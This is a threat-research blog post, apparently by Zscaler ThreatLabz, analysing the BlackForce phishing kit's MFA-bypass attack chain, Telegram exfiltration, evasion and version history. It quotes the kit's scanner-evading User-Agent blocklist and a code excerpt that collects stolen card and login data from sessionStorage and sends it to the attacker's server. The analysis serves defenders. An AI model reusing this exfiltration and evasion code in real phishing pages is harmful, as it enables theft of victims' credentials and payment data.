Technical Analysis of the BlackForce Phishing Kit

Introduction

Zscaler ThreatLabz identified a new phishing kit named BlackForce, which was first observed in the beginning of August 2025 with at least five distinct versions. BlackForce is capable of stealing credentials and performing Man-in-the-Browser (MitB) attacks to steal one-time tokens and bypass multi-factor authentication (MFA). The phishing kit is actively marketed and sold on Telegram forums for €200–€300. 

In this blog post, ThreatLabz examines the BlackForce phishing kit, including its evolution, evasion techniques, and architecture. The analysis examines versions 3, 4, and 5 of BlackForce, followed by a comparison highlighting the key differences and advancements across these versions.

Key Takeaways

• In August 2025, ThreatLabz first observed the BlackForce phishing kit which has been used to impersonate more than 11 brands, such as Disney, Netflix, DHL, and UPS.
• BlackForce facilitates Man-in-the-Browser (MitB) attacks that allow operators to dynamically bypass multi-factor authentication (MFA) in real time.
• BlackForce features several evasion techniques with a blocklist that filters out security vendors, web crawlers, and scanners.
• BlackForce remains under active development. Version 3 was widely used until early August, with versions 4 and 5 being released in subsequent months.
• BlackForce uses a dual-channel communication architecture that separates the phishing server from a Telegram drop, ensuring the stolen data is not lost if the phishing panel is taken down.

Technical Analysis

The following sections provide insight into each stage of BlackForce’s attack chain.

Discovery and code analysis

ThreatLabz began its analysis of BlackForce when we identified a distinct pattern while hunting for phishing campaigns. The suspicious domains consistently used JavaScript files with cache-busting hashes in their names. This led ThreatLabz to the phishing kit's entry point, a single line in the page's HTML source that loads the entire platform.

Cache-busting is a technique where a hash is generated based on the file's contents thus forcing the victim's browser to download the latest version of the malicious script instead of using a cached version. The code example below illustrates the DOM structure of the malicious webpage, featuring a filename format (index-[hash].js) that is commonly associated with professional build tools.

The most effective deception tactic used by the BlackForce phishing kit is its "legitimate-looking" codebase. Our analysis found that more than 99% of the malicious JavaScript file's content consists of production builds of React and React Router, giving it a legitimate appearance.

Attack chain

The BlackForce attack chain features a vetting system to qualify targets, after which a live operator takes over to orchestrate a guided compromise. The attack chain for this campaign is shown in the figure below.

Figure 1: Attack chain diagram depicting the BlackForce attack flow.

The sequence of events for a BlackForce phishing campaign are as follows:

1. The victim clicks on the phishing link and is directed to an attacker-controlled phishing page.

2. A server-side Internet Service Provider (ISP)/vendor blocklist is applied to the victim's IP or User-Agent, blocking any traffic identified as a crawler, scanner.

3. After user validation, the phishing page is served and is designed to appear as a legitimate website, as seen in the figure below.

Figure 2: Shows the legitimate-looking phishing page(s) displayed to the victim.

4. The victim, believing the page is authentic, enters their credentials, which are immediately captured by the attacker.

5. The attacker receives real-time victim session alerts and the exfiltrated credentials to their command-and-control (C2) panel alerting them of a live target. The stolen credentials are also sent to the attacker via a Telegram channel, as shown in the figure below.

Figure 3: The attacker’s view of the exfiltrated data being sent to Telegram.

6. The attacker attempts to log into the legitimate target website using the stolen credentials, triggering an MFA authentication prompt.

7. Using MitB attack techniques, the attacker deploys a fake MFA authentication page to the victim’s browser through the C2 panel, as shown in the figure below.

Figure 4: BlackForce control panel for version 3.

8. The victim's browser renders the fake MFA page, and the victim, unaware of the attack, enters their MFA code, as shown in the figure below.

Figure 5: Example BlackForce phishing page that hijacks an SMS code sent to the victim.

9. The attacker captures the MFA code and submits it to the legitimate website, successfully bypassing the MFA process and compromising the victim’s account.

ANALYST NOTE: It is important to note that not all BlackForce phishing campaigns display pages to steal MFA codes, since not all websites use MFA. If the website utilizes MFA, the BlackForce phishing kit’s control panel provides attackers with custom options (based on the target brand) to steal codes that are provided via SMS, card, or app-based authentication.

Once the attack is complete, the victim is redirected to the homepage of the legitimate website, hiding evidence of the compromise and ensuring the victim remains unaware of the attack.

Exfiltration channel

The networking module is the most important part of the BlackForce phishing kit. The attackers use Axios, a popular HTTP client, to manage all communication. Axios instances control the data flow in the kit. Version 3 of BlackForce includes two client-side Axios instances: one for C2 communication and another for exfiltrating data to a hardcoded Telegram channel. In versions 4 and 5 of BlackForce, only the primary C2 instance remains, and the Telegram configuration has been moved to the server-side. The figure below shows the BlackForce control panel used to set up the exfiltration channel for version 5.

Figure 6: BlackForce version 5 configuration for exfiltration settings. 

Anti-analysis filters

The BlackForce phishing kit employs anti-analysis techniques to evade detection and prolong its operational lifespan. The first line of defense is a proactive client-side filter, which attempts to identify non-human visitors the moment they land on the page. This is accomplished with a database of signatures and a parsing engine that processes the visitor's User-Agent string. The code compares the User-Agent against a set of predefined regular expressions to detect web crawlers, security scanners, and SEO tools, as shown in the example below.

{
    regex: "Nmap Scripting Engine",
    name: "Nmap",
    category: "Security Checker",
    url: "https://nmap.org/book/nse.html",
    producer: {
        name: "Nmap",
        url: "https://nmap.org/"
    }
},
{
    regex: "Netcraft( Web Server Survey| SSL Server Survey|SurveyAgent)",
    name: "Netcraft Survey Bot",
    category: "Search bot",
    url: "",
    producer: {
        name: "Netcraft",
        url: "http://www.netcraft.com"
    }
},
{
    regex: "MSNBot|msrbot|bingbot|BingPreview|msnbot-(UDiscovery|NewsBlogs)|adidxbot",
    name: "BingBot",
    category: "Search bot",
    url: "http://search.msn.com/msnbot.htmn",
    producer: {
        name: "Microsoft Corporation",
        url: "http://www.microsoft.com"
    }
},

In versions 4 and 5, the BlackForce C2 server proactively filters all incoming traffic. Version 4 enforces a mobile-only policy that rejects all desktop user agents and cross-references the remaining visitors' user agents, resolved hostnames, and ISPs against a comprehensive blocklist of keywords. Any signature associated with a security scanner or automated crawler results in an immediate redirect to a generic error page. The ISP blocklist for BlackForce version 4 is available in the ThreatLabz GitHub repository.

BlackForce also enforces a list of permitted countries and performs User-Agent profiling to immediately block any identified scanners and crawlers, as shown in the figure below.

Figure 7: Anti-analysis mechanisms implemented in version 5 of BlackForce.

Statefulness

A critical architectural difference separating BlackForce version 3 from its successors is the evolution from a stateless to a stateful attack model. In version 3, the attack was fundamentally fragile as exfiltrated credentials existed only in the browser's active memory. This meant a page refresh or network error could erase the stolen data and break the attack flow. To address this weakness, the author of BlackForce versions 4 and 5 leveraged the browser's sessionStorage to create a persistent, stateful session. This allows BlackForce to "remember" credentials across the entire multi-stage attack. The example below, taken from version 4, demonstrates how data is exfiltrated using the sendMessage function by retrieving it from sessionStorage.

try {
            o(!0);
            const m = y.ccn.replace(/\s/g, "");
            sessionStorage.setItem("cc", m);
            const x = {
                    ccn: y.ccn,
                    exp: y.exp,
                    cvv: y.cvv,
                    user: sessionStorage.getItem("user"),
                    pass: sessionStorage.getItem("pass"),
                    name: sessionStorage.getItem("name"),
                    dob: sessionStorage.getItem("dob"),
                    city: sessionStorage.getItem("city"),
                    phone: sessionStorage.getItem("phone"),
                    address: sessionStorage.getItem("address"),
                    zip: sessionStorage.getItem("zip")
                },
                C = await pt.sendMessage(x, e, "card"),
                P = (await pt.getConfig()).data.panel;
            C.data.status === "success" ? (o(!1), n(null), t(P === !0 ? "loader" : "confirm")) : (n(null), o(!1))
        }

C2 communication

The BlackForce C2 panel controls every action from the moment a victim lands on the page until their data is stolen. The panel provides a set of asynchronous functions that can be categorized into four distinct roles:

• Functions that identify the visitor, enrich stolen data, and protect the phishing kit from detection.
• Functions responsible for stealing victim data and sending it to the attacker.
• Functions that manage the real-time, interactive flow of the phishing session.
• Administrative functions used by an attacker to manage the attack.

The BlackForce C2 panel for version 5 is shown in the figure below.

Figure 8: BlackForce C2 panel for version 5. 

Comparison of BlackForce Versions 

The rapid versioning of BlackForce indicates the malware author is actively learning and adapting their tool to improve resilience and evade detection. The table below highlights the difference between the last three versions of BlackForce.

Table 1: A comparison between versions 3, 4, and 5 of BlackForce.

Conclusion

The authors of BlackForce are actively modifying and improving the phishing kit, as evidenced by the rapid release of multiple versions in a short period. The kit allows threat actors to conduct MitB attacks to bypass MFA, which can lead to a full account takeover. Organizations should deploy a zero trust architecture to limit access and minimize the damage that can be caused in such attacks.

Zscaler Coverage

Zscaler’s multilayered cloud security platform detects indicators related to this threat at various levels with the following threat name:

• HTML.Phish.BlackForce

Indicators Of Compromise (IOCs)

MITRE ATT&CK Framework